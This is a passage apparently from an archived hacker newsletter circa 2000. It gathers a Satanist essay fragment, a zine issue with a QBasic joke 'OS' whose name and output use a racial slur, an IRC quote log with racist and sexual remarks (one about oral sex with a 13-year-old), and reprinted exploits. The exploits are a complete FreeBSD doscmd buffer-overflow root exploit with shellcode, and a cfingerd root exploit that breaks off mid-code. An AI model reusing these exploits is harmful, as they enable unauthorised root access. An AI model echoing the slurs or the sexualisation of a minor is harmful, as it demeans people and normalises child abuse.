      of Satanism. It`s too bad stupidity isn`t painful. Ignorance is one 
      thing, but our society thrives increasingly on stupidity. It depends 
      on people going along with whatever they are told. The media promotes 
      a cultivated stupidity as a posture that is not only acceptable but 
      laudable. Satanists must learn to see through the tricks and cannot 
      afford to be stupid.
      
      2. Pretentiousness - Empty posturing can be most irritating and isn`t 
      applying the cardianl rules of Lesser Magic. On equal footing with 
      stupidity for what keeps the money in circulation these days. 
      Everyone`s made to feel like a big shot, whether they can come up with 
      the goods or not.
      
      3. Solipsism - Can be very dangerous for Satanists. Projecting your 
      reactoins, responses and sensibilities
       onto someone who is probably far less attuned than you are. It is the 
      mistake of expecting to people give you the same consideration, 
      courtesy and respect that you naturally give them. They won`t. 
      Instead, Satanists must strive to apply the dictum of "Do unto others 
      as they do unto you." It`s work for most of us and requiers constant 
      vigiliance lest you slip into a comfortable illusion of everyone being 
      like you. As has been said, certain utopias would be ideal in nation 
      of philosophers, but unfortunately (or perhaps fortunately, from a 
      Machiavellian standpoint) we are far from that point.
      
      4. Self-deceit - It`s in the "Nine Satanic Statements" but deserves to 
      be repeated here. Another cardianl sin. We must not pay homage to any 
      of the sacred cows presented to us, including the roles we are 
      expected to play ourselves. The only time self-deceit should be 
      entered into is when it`s fun, and with awareness. But then, it`s not 
      self-deceit!
      
      5. Herd Conformity - That`s obvious from a Satanic stance. It`s all 
      right to conform to a person`s wishes, if it ultimately benefits you. 
      But only fools follow along with the herd, letting an impersonal 
      entity dicate to you. The key is to choose a master wisely instead of 
      being a enslaved by the whims of the many.
      
      6. Lack of Perspective - Again, this one can lead to a lot of pain for 
      a Satanist. You must never lose sight of who and what you are, and 
      what a threat you can be, by your very existence. We are making 
      history right now, every day. Always keep the wider historical and 
      social picture in mind. That is an important key to both Lesser and 
      Greater Magic. See the patterns and fit thingd together as you want 
      the pieces to fall into place. Do not be swayed by herd constraints - 
      know that you are working on another level entirely from the rest of 
      the world.
      
      7. Forgetfulness of Past Orthodoxies - Be aware that this is one of 
      the keys to brainwashing people into accepting something new and 
      different, when in reality it`s something that was once widely 
      accepted but is now presented in a new package. We are expected to 
      rave about the genius of the creator and forget the original. This 
      makes for a disposable society.
      
      8. Counterproductive Pride - That first word is important. Pride is 
      great up to the point you begin to throw out the baby with the 
      bathwater. The rule of Satanism is: if it works for you, great. When 
      it stops working for you, when you have painted yourself into a corner 
      and the only way out is to say, I`m sorry, I made a mistake, I wish we 
      could compromise somehow, then do it.
      
      9. Lack of Aesthetics - This is the physical application of the 
      Balance Factor. Aesthetics is in important in Lesser Magic and should 
      be cultivated. It is obvious that no one can collect any money off 
      classical standards of beauty and form most of the time so they are 
      discouraged in a consumer society, but an eye for beauty, for balance, 
      is an essential Satanic tool and must be applied for greatest magical 
      effectivness. It`s not what`s supposed to be pleasing - it`s what is. 
      Aesthetics is a personal thing, reflective of one`s own nature, but 
      there are universally pleasing and harmonious configurations that 
      should not be denied.
      
      ----------------------------------------------------------------------
      
      
      Okay, I was planning to do a littel satanic history here, but I won`t.
       I`m tired of writing this article, but I hope you read it and found 
      at least some of it interesting, or even better, got provoked by it.
      
      Vegtam
      february 2000
      
      
      
      
      000           00000               000     00  00        00000      000
      000          0000000              000     00  00      00000000     000
      000         000000000             000    000  00     000    000    000
      000  00     000  0000             000  00000000000  000   0  000   000
      000 0000   0000   000   00000000  000 000000000000  00  00000000   000
      000000000  0000   000  000000000  000 000000000000 000 0000000 00  000
      0000000000 0000   000 0000  0000  000    00  00    00 000  000 00  000
      000   0000 0000   000 0000  0000  000   000  00    00 000  000 00  000
      000   0000 0000   000 000   0000  000   000  00    00 000  000 00  000
      000   0000 0000   000 000   0000  000 00000000000  00 000  000 00  000
      000   0000 0000   000 000   0000  00  00000000000  00 000  000 00  00 
      000   0000 0000   000 0000 00000        00  00     000 0000000000     
      00000000   0000000000  000000000  000  000  00      00 000000000   000
      00000000    00000000   000000000  000  000 000      000 00 00000   000
       000000      000000     000 0000  000  00  00        000           000
                                  0000                       00000000       
                             000000000                        000000        
                             000000000                                      
                             00000000
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      [ note from the editor, sorry about messing up the appearance of your 
      leet ascii :( ]
      
      
      Negr/OS is the latest underground news since phf baby ! . Elitely and 
      stablely coded in one of todays most widely used and trusted language
      Qbasic. Yep !.Thats right . Placing youz in total fear mode is our ob-
      jec-tive here at stupidphat.
      Latest kernel' build' out now is kernel 3.1.3.3.7
      Source is freely distributed so have fun messing with it. To 
      successfully run negr / OS You need QBASIC. If you dont have it could 
      could download QBASIC Here: 
      http://dialect.stupidphat.com/qbasic.exe.
      
      
      ASM format is available only for the leet++ at:
      http://dialect.stupidphat.com/neg.asm
      
      
      Screenshots of Negr/OS in action can be found here:
      http://dialect.stupidphat.com/neg1.jpg
      http://dialect.stupidphat.com/neg2.jpg
      http://dialect.stupidphat.com/neg3.jpg
      
      
      
      Don take me wrong. This is all a big joke and I'm not racist 
      (sometimes) and
      ummmm this project isnt supposed to be all that. I will tell you 
      though.
      that negr/OS DOES WORK. its not really an os. just a dos shell. but 
      the
      name fit well :D
      
      
      
      
      REM **** negr/OS ******
      REM Kernel    3.1.3.3.7
      REM **** dialect ******
      
      DIM login$
      DIM pw$
      DIM prompt$
      DIM dir$
      DIM rm$
      DIM host$
      DIM yourmoma$
      REM no_need_to_DIM_anything$
      
      
      CLS
              COLOR 10
              SCREEN 12
      PRINT " "
      PRINT " "
      PRINT "    NNN    NNNN                                 //// 
      OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNN   NNNN                                ////  
      OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNNN  NNNN                               ////   OOOO   
      OOOO SSSS"
      PRINT "    NNNNNN NNNN eeeeeeee gggggggg rrr rrrr   ////    OOOO   
      OOOO SSSSSSSSSSS"
      PRINT "    NNNNNNNNNNN eee  eee ggg  ggg rrrrrrrr  ////     OOOO   
      OOOO SSSSSSSSSSS"
      PRINT "    NNNN NNNNNN eeeeeeee ggg  ggg rrrr     ////      OOOO   
      OOOO        SSSS"
      PRINT "    NNNN  NNNNN eee      ggg  ggg rrr     ////       
      OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "    NNNN    NNN eeeeeeee gggggggg rrr    ////        
      OOOOOOOOOOO SSSSSSSSSSS"
      PRINT "                              ggg"
      PRINT "                         gggggggg"
      PRINT " "
      PRINT "                         The Black Operating System !"
      
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
                                                    PRINT
      
            PRINT "(Stupidphat.com) negr/OS (ttyp1) fastlink01"
             
                                              SCREEN 12
            LINE (25, 25)-(52, 67), B
            LINE (214, 234)-(23, 45), B, B
      
              COLOR 3
              PRINT
              SCREEN 12
              PRINT
      
      1       INPUT "login: ", login$
              INPUT "password: ", pw$
      
      
      IF pw$ = "pass" THEN
              PRINT
              COLOR 8
      
              PRINT "Negr/OS  Kernel Build : 3.1.3.3.7. "
              PRINT
              COLOR 3
              PRINT "Logged in as user: ";
              PRINT login$
              PRINT "Your shell is /negros/shells/freshmozzarela&sausage"
              PRINT
              PRINT "# MOTD"
              PRINT "Welcome to Negr/OS ! Type help for commands @#$"; ""
              PRINT
              PRINT
      
      
      
              GOTO 2
                      ELSE
                              PRINT
      COLOR 7
              PRINT "Invalid username or password"
              PRINT
              COLOR 3
              GOTO 1
              END IF
      2       PRINT "[";
              COLOR 4
              PRINT login$;
              COLOR 3
              PRINT "@";
              INPUT "negr/OS ]> ", sysprompt$
             
      IF sysprompt$ = "adduser" THEN
              INPUT "Enter the new user name :", user$
                      INPUT "Enter a password :", pass1$
                              INPUT "Re-Enter the password : ", pass2$
      END IF
      
      IF pass1$ = pass2$ THEN
              OPEN "usrs.txt" FOR OUTPUT AS #1
              PRINT #1, "Username : " + user$
                      PRINT #1, "Password : " + pass1$
      CLOSE #1
      ELSE
              PRINT "Passwords did not match"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "dir /w" THEN
              SHELL "dir /w"
              GOTO 2
      END IF
      
      IF sysprompt$ = "dir /p" THEN
              SHELL "dir /p"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "rm" THEN
              PRINT
              COLOR 9
              INPUT "[RM File] ", rm$
              SHELL "del " + rm$
              COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "" THEN
      GOTO 2
      END IF
      
      IF sysprompt$ = "cls" THEN
              SHELL "cls"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "clear" THEN
              SHELL "cls"
              GOTO 2
      END IF
      
      
      IF sysprompt$ = "ver" THEN
              PRINT
              
      COLOR 10
      PRINT "Negr/OS Version 3.1.3.3.7 and dont ever forget it!"
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "fdisk" THEN
      SHELL "c:\windows\system\fdisk.com"
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "ping" THEN
      PRINT
      COLOR 9
      INPUT "[Ping target] ", host$
      SHELL "ping " + host$
      COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "help" THEN
      PRINT
      COLOR 12
      PRINT "cd       help    rm      ver     who     dir     "
      PRINT "hello.c  cd ..   a:      pwd     rm -rf  logout  "
      PRINT "exit     time    txt     c:      hi      Unix    "
      PRINT "cls      clear   fdisk   ping    adduser dir /w/p"
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "cd" THEN
      PRINT
      COLOR 9
      INPUT "[ Dir ] ", dir$
      SHELL "cd " + dir$
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "pwd" THEN
      SHELL "cd"
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "dir" THEN
              SHELL "dir"
              GOTO 2
      END IF
      
      IF sysprompt$ = "cd .." THEN
              SHELL "cd .."
              GOTO 2
      END IF
      
      IF sysprompt$ = "a:" THEN
              SHELL "a:"
              GOTO 2
      END IF
      
      IF sysprompt$ = "hello.c" THEN
      PRINT
      COLOR 8
      PRINT
      PRINT "HELLO WORLD #@$@#$! "
      PRINT
      COLOR 3
      GOTO 2
      END IF
      
      IF sysprompt$ = "rm -rf" THEN
      PRINT
      
      COLOR 8
      PRINT
      PRINT " j00 fucking mor0n !"
      PRINT
      COLOR
      GOTO 2
      END IF
      
      
      
      IF sysprompt$ = "logout" THEN
              CLS
              GOTO 1
      END IF
      
      IF sysprompt$ = "exit" THEN
              END
      END IF
      
      IF sysprompt$ = "who" THEN
              PRINT
              COLOR 4
              PRINT login$
              PRINT
              COLOR 3
              GOTO 2
      END IF
      
      IF sysprompt$ = "time" THEN
              SHELL "time"
              PRINT
              GOTO 2
      END IF
      
      IF sysprompt$ = "c:" THEN
              SHELL "c:"
              PRINT
              GOTO 2
      END IF
      
      IF sysprompt$ = "ls" THEN
              PRINT
              COLOR 15
              PRINT "best step !$# : try dir instead : neener neener.";
              PRINT
              COLOR 3
              PRINT "."
              GOTO 2
      END IF
      
      IF sysprompt$ = "txt" THEN
      PRINT
      COLOR 8
      INPUT "[ TXT ] ", txt$
      SHELL "" + txt$
      COLOR 3
      GOTO 2
      END IF
      
      
      IF sysprompt$ = "hi" THEN
              PRINT "hi"
              ELSE
              PRINT
              COLOR 15
              PRINT ":nigga best recognize : [";
              COLOR 5
              PRINT sysprompt$;
              COLOR 15
              PRINT "] : not a command";
              COLOR 3
              PRINT "."
              PRINT
              GOTO 2
              END IF
      
      IF sysprompt$ = "cd" + dir$ THEN
      PRINT
      COLOR 8
      INPUT "[ Dir ] ", dir$
      SHELL "cd " + dir$
      COLOR 3
      GOTO 2
      END IF
      
      
      
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: irc quotes  misc  irc.undernet.org ::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      
      
      <Od1um> prae r u female? or wut?
      
      <BadAssGuy> Hey everyone, I NEED MAJOR HELP! Please, if you know how 
      to lag someone out of any "Microsoft Internet Gaming Zone" game, I 
      WOULD LIKE TO KNOW! Please, I am desperate! Message me, thank you!!!!
      
      <k-rad-bob> the first chick that gave me oral was only 13...she could 
      barely take it n her mouth, i had teethmarks on my penis for a week
      
      <grid> chris`: are you learning disabled by any chance?
      
      <MonkeyPot> you got aol private chat room names?
      
      <m1lk\f00d> twist: will you show her my pic and tell her that i like 
      her, then ask if she could ever love a guy like me
      <Greenie> lol@ me gettin sad and icq'in prae hehe
      <Prae> eh?
      <TwisT> nah bob
      <m1lk\f00d> why not?
      <adam> i got caught by my little sister masterbating to some online     
               porn
      <adam> she said, "what are you doing to that"
      <adam> i said "trying to kill it"
      <adam> and "can you help me"
      <adam> lol
      <adam> doesnt no one care
      <adam> this is child abuse
      <adam> i was only joking
      <adam> geez
      <adam> you really think ?
      <adam> mg
      <adam> issues
      
      [canonbal:#hacktech PING]
      <canonbal> unlagging
      <canonbal> slowly
      <canonbal> heh
      *** canonbal` has quit IRC (Lost irc connection from 207.170.201.226: 
      Broken pipe)
      
      
      <k3rR> hello? Does anyone know anything about earthserv webpage 
      provider i got an account but now it says the site has no dns entry it 
      used to just say page contains no data.does anyone know why or when 
      earthserv will be running again?
      
      <`DS> anybody know where to find violence stats?
      
      <twist182> I JUST WROTE MY FIRST PERL PROGRAM!!!
      <twist182> IM SO FUCKING ELITE
      <twist182> FUCK YOU ALL
      <twist182> HAHAHAHAHAAHHA
      <Prae> splendid james
      <twist182> FUCK YOU ALL!!!!!!!!!!!!!!!!!!!!!!!
      <AlphaTec> uhm...
      <Prae> i wrote my 27th TCL script today
      <ect> lol
      <AlphaTec> hello.pl ?
      <twist182> :(
      <Prae> before you fcrashed me
      <twist182> NO
      <Prae> you twat
      <AlphaTec> oh
      <twist182> its far more k-rad
      * twist182 giggles
      <twist182> prae :(
      <AlphaTec> twist
      <twist182> yeah
      <AlphaTec> what perl book is it?
      <AlphaTec> what one are you reading?
      <Prae> 'perl for canadian fags'
      
      
      <Dr_Pain_>  i need help here about a cble modem to nuke theres a girl 
      who has take my nick and put it on a child porn chan and im unable to 
      nuke that bitch shes on cable im in winshit
      
      <thep0et> bob how come smoking makes me horny? watching people smoke 
      makes me erect, is this a problem?
      
      *** |RAT| has joined #k-rad
      <Prae> did you signup bob?
      <k-rad-bob> yes
      <k-rad-bob> h0h0h0h0h0h
      <Prae> basic?
      <k-rad-bob> MASTER!
      <|RAT|> hmmmmmm
      <Prae> elite!
      <Prae> Vicki is such a sweetie
      <Prae> you'll see
      <k-rad-bob> what about bandwith?
      <|RAT|> Isn't this a hacking channel????
      <Prae> fast
      <k-rad-bob> yes rat
      <Prae> no rat
      <Prae> its a sex channel
      <|RAT|> ooooops
      *** |RAT| has left #k-rad
      <k-rad-bob> its also a sex channel
      <Prae> hahahaha!!!!!!
      
      <sdf> NOONE IS LEAVING THIS CHANNEL WITHOUT A GROUP HUG
      *** sdf was kicked by RLoxley (Too many damn caps!)
      
      *** asmith has joined #hacktech
      <asmith> hi
      <asmith> can somone send me a prog that gets i-net p-words and u-names
      
      <jeczilak> Anyone know where I can get getadmin.exe
      
      <Prae> roses are red and violets are twisted, bend over james cause 
      you're about to get fisted.
      
      <thep0et> alot of black metal bands butt fuck eachother on stage
      
      <snookems> eww this girl at my old highschool once was dared to shove 
      a hotdog intoside herself and she got it like all the way and it broke 
      off. she had to go to the hospital and get it removed. i dunno i felt 
      like sharing that. probably becaus i am in a goofy mood now.
      
      *** twist182 has quit IRC (Excess Flood)
      *** twist182 has joined #hackphreak
      *** twist182 has quit IRC (Excess Flood)
      <RLoxley> twist=0wned
      
      <NazXuL-X> hey.
      <NazXuL-X> i went to mplayer last night. its still gay
      <k-rad-bob> so you blended in quite well?
      
      <k-rad-bob> im having sex with my left hand from now on
      <twist182> prae
      <twist182> bob, why the switch?
      <Prae> !?
      <Prae> im ambedextrus
      <Prae> i use both
      <Prae> :)
      <twist182> i use my feet
      <k-rad-bob> to make my right one jealous so that she'll work way 
      harder when i give her another chance
      
      *** A17mPA has joined #hacktech
      <A17mPA> hi every1. Question. Has anyone heard of something called AOL 
      IM Sysop?
      <A17mPA> or something like that
      
      <jeczilak> How well does getadmin.exe work?
      
      <Shizzy> We need more women in here.. thats the problem in a 
      nutshell... women that aren't to bright so they will go along with 
      anything we say haha
      
      <g-sync> does anybody have a unix i can borrow??????
      
      *** RLoxley has joined #hacktech
      <G0th1c> hey RL
      <RLoxley>  [5m [1;31mh [1;32me [1;34ml [1;33ml [1;31mo [1;32m, 
       [1;34mh [1;33ma [1;31mc [1;32mk [1;34me [1;33mr [1;31ms [0m
      *** RLoxley is now known as grid
      <grid> coOOl i dont feel gay anymore
      <grid> i am cured
      <grid> goodbye for now.
      *** grid has left #hacktech
      *** fraglord has joined #hacktech
      <canonbal> *** RLoxley is now known as grid
      <canonbal> rloxley and grid arent the same ppl are they? Heh
      
      <fraglord> does anyone have a webpage or know of a cool program that 
      hacks ICQ passwords or hotmail passwords
      
      <Uneek> I've got more skills on the tip of my cock then you've got in 
      your whole brain!!!
      
      <h2so4> i havent been afk for like 5 days
      
      *** thep0et has Quit IRC (I'm black and i don't work for a 
      living...are you surprised?)
      
      <niemand1> i find masturbation a good way to make bath's more fun
      
      <vuduisz> they cant talk about security, 2600 dont know shit about 
      security
      
      *** ZeRiAl has joined #hackphreak
      <ZeRiAl> hey you guys, u happen to know of a program to get login and 
      pswd from a porn site?
      
      *** M1K4 has joined #hackuk
      <M1K4> i need some carding instructions
      
      * Prae2k/#k-rad is learning how to masturbate whilst doing a handstand
      * thep0et/#k-rad is learning how to ignore prae's stupid pointless 
      comments which make no sence what so ever
      
      *** alltra has joined #hacktech
      <alltra> anyone know anyhting that will screw someone over real bad if 
      all I have is their ip number?
      
      <thep0et> could you imagine if our penises acted like elephant trunks? 
      and we had to feed our selves like that
      
      *** tobsgal has joined #hackuk
      <tobsgal> any lesbian or bi females want to chat
      
      *** ubre has joined #HackTech
      <ubre> hi, guys pls help. How do i see someone's IP server in a chat?
      
      *** SpeedSwim has joined #HackTech
      <SpeedSwim> hety any of you have a big virus or kno where I cna get 
      one?
      
      *** hey has joined #HackTech
      <hey> is they re somebody who could tell me how to hack  somebody on 
      irc  our can give me a sites????????????????????
      
      <The0ry> without masturbation there is nothing
      <The0ry> sekz, i serioulsy used to masturbate about 15 to 20 times a 
      day
      <The0ry> seriously even
      
      *** thik has joined #hacktech
      <thik> Can anybody show me how to hack ????
      
      *** weesel has joined #hacktech
      <weesel> hello
      <weesel> does anyone know of a proggie that will let me into someones 
      HDD useing ICQ?
      
      *** Drumguy has joined #hacktech
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      <Drumguy> Anybody know operatior or administraitor Yahoo Chat 
      commands?
      
      *** Drumguy has joined #hacktech
      <Drumguy> Does anybody know kick certain people out of Yahoo Chat 
      Rooms?
      
      *** moeska has joined #hacktech
      <moeska> can someone tell me how to ping to a specified port?
      
      *** bcsiss has joined #hacktech
      <bcsiss> i need help
      <canonbal> with?
      * fraggy is back: from -(tv)- gone -(10mins 56secs)-
      <bcsiss> is there anyway to hack into someone elses computer through 
      mirc?
      
      *** Killer has joined #hacktech
      <Killer> can someone disconnect a clone of me that has fucked up?
      
      *** Zero|kewl has joined #hacktech
      *** hst has quit IRC (bbl)
      <Zero|kewl> does anybody use wwwhack?
      
      *** Freddo has joined #hacktech
      <Freddo> does anybody know NT hack???
      -X- Ban list updated
      * h420i is away: -(could irc be any more boring?)- since -(23:18)- 
      pager -(on)-
      <Freddo> does anybody know NT hack???
      *** G|GAWH0RE has joined #hacktech
      <fraggy> isn't freddo the guy who gets shot in the movie?
      <Freddo> ???
      <fraggy> n/m
      <rafay> :P
      *** koshie has quit IRC (Ping timeout for 
      koshie[get.your.free.shell.at.shellyeah.org])
      <Freddo> http://www.tuxedo.org/~esr/faqs/hacker-howto.html
      <Freddo> sorry
      <Freddo> wrong paste
      <k-rad-bob> lol
      <fraggy> as opposed to the right paste?
      <k-rad-bob> you nail him fraggy
      <Freddo> does anybody know NT hack???
      <fraggy> eh?
      <Freddo> this is correct
      <rafay> w0rd bob
      <rafay> he is just asking a question
      <rafay> :P
      <k-rad-bob> hehe
      <k-rad-bob> sowwie
      <Freddo> so ... does anybody know NT hack???
      <k-rad-bob> lol
      <k-rad-bob> i cant help myself
      <fraggy> haha
      <fraggy> Freddo, say that again. i crack up everytime i read that
      <|cH|cKeN|> hehe
      <Freddo> ok... does anybody know NT hack???
      
      *** lioufman has joined #hacktech
      <rafay> HEH
      *** cTq has left #hacktech
      * lioufman exei pathei plaka me to <<NiRVaNa 2000b>> by NiRVaNaiR 
      [100% Megali eukolia dike mou]
      
      *** Mike`` has joined #hacktech
      <Mike``> can someone help me with something?
      <k-rad-bob> what is it?
      <Mike``> i got a pw cracker but i can't get it to work
      *** Mike`` was kicked by fraggy ( i got this AOL punter proggie but i 
      don't know how it works....... oh, never mind )
      *** Mike`` has joined #hacktech
      <Mike``> funny??
      <|cH|cKeN|> not really
      <fraggy> yes. very
      <|cH|cKeN|> ur just gay
      
      *** L_Mental has joined #hacktech
      <L_Mental> need to know: are there any binders for exe+image?
      
      *** kingpin1 has joined #hacktech
      <kingpin1>   __              ___    ___              
      <kingpin1>  /\ \            /\_ \  /\_ \             
      <kingpin1>  \ \ \___      __\//\ \ \//\ \     ___    
      <kingpin1>   \ \  _ `\  /'__`\\ \ \  \ \ \   / __`\  
      <kingpin1>    \ \ \ \ \/\  __/ \_\ \_ \_\ \_/\ \L\ \ 
      <kingpin1>     \ \_\ \_\ \____\/\____\/\____\ \____/ 
      <kingpin1>      \/_/\/_/\/____/\/____/\/____/\/___/  
      
      <Prae> hi
      <Prae> can i ask you a few questions?
      <gay18> ok pls
      <Prae> firstly, are you a man or a woman?
      <gay18> man and gay
      <gay18> u
      <Prae> im a man
      <Prae> where do you live?
      <gay18> istanbul
      <Prae> What is the first thing that pops into your head when i say       
               poop?
      <gay18> nothng
      <Prae> nothing?
      <Prae> how do you feel about poop?
      <Prae> do you think its good or bad?
      <gay18> you mean poop musc
      <Prae> no
      <Prae> i mean poop as in shit
      <Prae> the brown stuff that comes from your anus
      <gay18> bad
      <Prae> why is it bad?
      <gay18> you are realy sht
      <Prae> and why is that?
      <Prae> does poopsex.com disgust you?
      <Prae> ok, so.. if i say "I want to poop in your mouth." what does
               that make you feel?
      <Prae> angry?
      <Prae> happy?
      <gay18> pls be nce man chat nce thngok
      <Prae> but i want to know how you feel about poop
      <Prae> please, tell me..
      <gay18> ok pls you dont want to be nce i leave
      <gay18> by
      
      <tress> <GrEEnMK> how can i edit file in unix ?
      <tress> <YoJaUta> with a text editr
      <tress> <YoJaUta> but real men use magnetic tipped needles to directly 
                 write to the hd platter
      <tress> <GrEEnMK> ahh
      <tress> <GrEEnMK> what text editor ?
      
      *** TuCoWS has joined #hacktech
      <TuCoWS> Hola Intercambio utilidades, nuckes antinuckes, virus 
      antivirus, troyanos antitroyanos,  cortafuegos, antiflood, floods, 
      crackers, antiBO antiNetbus, manuales sobre informatica en gral. como 
      irc telnet o lo que sea, si tienen alguna las intercambiamos por 
      correo electronico no por "dcc send", en especial busco spoofers y 
      patchs para windows 98, quien este interesado escriba asi :  /query 
      tucows , y me encontraran, gracias
      *** TuCoWS has left #hacktech
      
      <Prae2k> >:\
      <Prae2k> my mouse is fucked up
      <Prae2k> i think its drunk
      <madwill> lol
      * madwill hands praes mouse another beer
      <Prae2k> >:\
      <Prae2k> he had enough
      <Prae2k> i wrote 'CUNT' on it
      <Prae2k> about 6 months ago
      <Prae2k> i can still see it
      
      <mcx^> im sorry for nuking you earlier :(
      <mcx^> EVERYONE
      <pez> its ok, i dont think i was at the computer
      <Sekz> ADSL gets here in 6 months.
      <mcx^> MCX WANTS TO APOLOGIZE FOR HIS NUKING
      
      
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::: notes from the editor  k-rad-bob  808@c2i.net :::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      AGH!
      So much work. Editing this issue has been hell, but still it has been 
      a joy. Issue two is out and we have proven that we arent a one time 
      only zine, like *cough* pursuit and *cough* b4b0 and *cough* phrack.
      
      Also the feedback we have been receiving has been nothing less but 
      heartwarming. Now all that is left to be said is: Contribute or die!
      Link our site or die! Mass forward our URL to everyone on your icq, 
      email it to everyone you can, and Spam all the Usenet groups with it!
      
      This issue could be better but due to the fact that our domain is 
      finally up and running we are all exited so here goes nothing.
      
      Official b0g site: http://www.b0g.org
      Contact: irc in #k-rad on undernet
      By email: b0g@b0g.org
      
      Contributions can be sent to contribute@b0g.org
      
      Thats all :)
      
      
      
      
      Shouts and his goes out to all of #k-rad #hacktech #hackuk #whhs and 
      to all the other undernet dogs!
      
      
      @HWA
      
162.0 FreeBSD 3.4-STABLE exploit doscmd.c
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      /*
      *
      * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * FreeBSD 3.4-STABLE /usr/bin/doscmd exploit.
      *
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define BUFSIZE         1000
      #define ADDRS           1200
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              char *buf, *p;
              int noplen, i, ofs, align;
              long ret, *ap;
              FILE *fp;
      
              if(!(buf = (char *)malloc(BUFSIZE+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); }
      
              ofs = atoi(argv[1]);
              align = atoi(argv[2]);
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              setenv("EGG", buf, 1);
      
              free(buf);
      
              if(!(buf = (char *)malloc(ADDRS+align+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              memset(buf, 'a', align);
      
              p = &buf[align];
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "ret: 0x%x\n", ret);
      
              execl("/usr/bin/doscmd", "doscmd", buf, 0);
      
              return 0;
      }
      
      
      
      /*           =- passed thru infected network  -=         */
      /*           =-   http://infected.ilm.net/    -=         */
      
      @HWA      
      
163.0 cfingerd 1.3.3 (*bsd) root sploit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      
      
      /*
      * babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * cfingerd 1.3.3 (*bsd) root sploit
      *
      * usage: adjust ptr until cfingerd will segfault with some random data on
      * output, now adjust ret.
      */
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <unistd.h>
      #include <errno.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <netdb.h>
      #include <string.h>
      
      #define BUFFER_SIZE     80
      #define ADDRS           190
      #define PTR             0xbfbfd750
      #define RET             0xbfbfd7d2
      #define NOP             0x90
      #define FILE1           "user.inf"
      #define FILE2           "hack"
      #define FILE3           "set.c"
      #define SHELL           "/tmp/sh"
      #define FINGER          79
      #define MAXLINE         1024
      #define LOCALHOST       0x7f000001
      #define GREEN           "\E[1;32m"
      #define RED             "\E[1;31m"
      #define NORM            "\E[1;39m"
      #define UNBOLD          "\E[m"
      
      void sh(sockfd)
      int sockfd;
      {
              char buf[MAXLINE];
              int c;
              fd_set rf, drugi;
      
              FD_ZERO(&rf);
              FD_SET(0, &rf);
              FD_SET(sockfd, &rf);
      
              while (1)
              {
                      bzero(buf, MAXLINE);
                      memcpy (&drugi, &rf, sizeof(rf));
                      select(sockfd+1, &drugi, NULL, NULL, NULL);
                      if (FD_ISSET(0, &drugi))
                      {
                              c = read(0, buf, MAXLINE);
                              send(sockfd, buf, c, 0x4);
                      }
      
                      if (FD_ISSET(sockfd, &drugi))
                      {
                              c = read(sockfd, buf, MAXLINE);
                              if (c<0) return;
                              write(1,buf,c);
                      }
              }
      }
      
      int connectto(void)
      {
              int sockfd;
              char sendbuf[MAXLINE];
              struct sockaddr_in cli;
      
              bzero(&cli, sizeof(cli));
              cli.sin_family = AF_INET;
